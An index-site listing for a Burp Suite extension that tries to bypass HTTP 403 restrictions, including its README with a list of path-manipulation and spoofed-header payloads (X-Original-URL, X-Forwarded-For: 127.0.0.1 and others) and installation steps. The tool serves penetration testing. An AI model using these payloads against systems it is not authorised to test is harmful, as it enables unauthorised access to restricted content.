Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/sting8k/BurpSuite_403Bypasser
Burpsuite Extension to bypass 403 restricted directory
https://github.com/sting8k/BurpSuite_403Bypasser
Last synced: 21 days ago
JSON representation
Burpsuite Extension to bypass 403 restricted directory
- Host: GitHub
- URL: https://github.com/sting8k/BurpSuite_403Bypasser
- Owner: sting8k
- Created: 2020-11-12T12:49:12.000Z (about 4 years ago)
- Default Branch: main
- Last Pushed: 2023-06-29T06:13:03.000Z (over 1 year ago)
- Last Synced: 2024-08-05T17:37:37.641Z (4 months ago)
- Language: Python
- Homepage:
- Size: 114 KB
- Stars: 1,530
- Watchers: 31
- Forks: 203
- Open Issues: 5
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - sting8k/BurpSuite_403Bypasser - Burpsuite Extension to bypass 403 restricted directory (Python)
- StarryDivineSky - sting8k/BurpSuite_403Bypasser
README
# 403Bypasser
An burpsuite extension to bypass 403 restricted directory. By using PassiveScan (default enabled), each 403 request will be **automatically** scanned by this extension, so just add to burpsuite and enjoy.Payloads:
$1: HOSTNAME
$2: PATH
```
$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2"
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1"
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/
```__Thanks [@lohubi](https://github.com/lobuhi) for contributing many payloads.__
## Installation
`BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish`
## Screenshot
## References:
* [https://twitter.com/iam_j0ker/status/1324354024657711106?s=20](https://twitter.com/iam_j0ker/status/1324354024657711106?s=20)
* [https://twitter.com/jae_hak99/status/1297556269960540161?s=20](https://twitter.com/jae_hak99/status/1297556269960540161?s=20)
* [https://twitter.com/SalahHasoneh1/status/1296572143141031945](https://twitter.com/SalahHasoneh1/status/1296572143141031945)
* [https://twitter.com/lobuhisec/status/1329705441883017218](https://twitter.com/lobuhisec/status/1329705441883017218)